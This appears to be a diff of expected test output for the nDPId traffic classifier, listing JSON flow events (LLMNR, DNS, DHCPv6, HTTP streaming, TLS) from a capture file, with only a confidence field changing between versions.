+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104432318,"flow_last_seen":1470104432318,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59062,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104402624,"flow_last_seen":1470104402724,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":49735,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104380737,"flow_last_seen":1470104380772,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104430065,"flow_last_seen":1470104430476,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":57143,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399854,"flow_last_seen":1470104399854,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.0.100","dst_ip":"255.255.255.255","src_port":50925,"dst_port":5678,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399854,"flow_last_seen":1470104399854,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.0.100","dst_ip":"255.255.255.255","src_port":50925,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104409586,"flow_last_seen":1470104409685,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":53938,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1470104379117,"flow_last_seen":1470104424357,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":28815,"flow_avg_l4_payload_len":670,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1470104379117,"flow_last_seen":1470104424488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":59649,"flow_avg_l4_payload_len":864,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1470104379118,"flow_last_seen":1470104424418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":48329,"flow_avg_l4_payload_len":792,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1470104379118,"flow_last_seen":1470104424446,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":45401,"flow_avg_l4_payload_len":698,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104379066,"flow_last_seen":1470104379115,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1470104379118,"flow_last_seen":1470104424360,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":23690,"flow_avg_l4_payload_len":696,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1470104379119,"flow_last_seen":1470104424435,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":42391,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1470104376816,"flow_last_seen":1470104392380,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::406:55a8:6453:25dd","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104382448,"flow_last_seen":1470104382857,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104432630,"flow_last_seen":1470104432728,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":65496,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104378045,"flow_last_seen":1470104378454,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104409586,"flow_last_seen":1470104409685,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":53938,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1470104379117,"flow_last_seen":1470104424357,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":28815,"flow_avg_l4_payload_len":670,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1470104379117,"flow_last_seen":1470104424488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":59649,"flow_avg_l4_payload_len":864,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1470104379118,"flow_last_seen":1470104424418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":48329,"flow_avg_l4_payload_len":792,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1470104379118,"flow_last_seen":1470104424446,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":45401,"flow_avg_l4_payload_len":698,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104379066,"flow_last_seen":1470104379115,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1470104379118,"flow_last_seen":1470104424360,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":23690,"flow_avg_l4_payload_len":696,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1470104379119,"flow_last_seen":1470104424435,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":42391,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1470104376816,"flow_last_seen":1470104392380,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::406:55a8:6453:25dd","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104382448,"flow_last_seen":1470104382857,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104432630,"flow_last_seen":1470104432728,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":65496,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104378045,"flow_last_seen":1470104378454,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1470104410885,"flow_last_seen":1470104428908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6132,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1470104410885,"flow_last_seen":1470104428908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6132,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104381895,"flow_last_seen":1470104382125,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":633,"flow_tot_l4_payload_len":1497,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":419,"flow_first_seen":1470104382053,"flow_last_seen":1470104433789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":161031,"flow_avg_l4_payload_len":384,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Media"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104378901,"flow_last_seen":1470104378905,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"}} +00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104381895,"flow_last_seen":1470104382125,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":633,"flow_tot_l4_payload_len":1497,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":419,"flow_first_seen":1470104382053,"flow_last_seen":1470104433789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":161031,"flow_avg_l4_payload_len":384,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Media"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104378901,"flow_last_seen":1470104378905,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"}} 00605{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":200000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:feea:365","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":200000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:feea:365","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 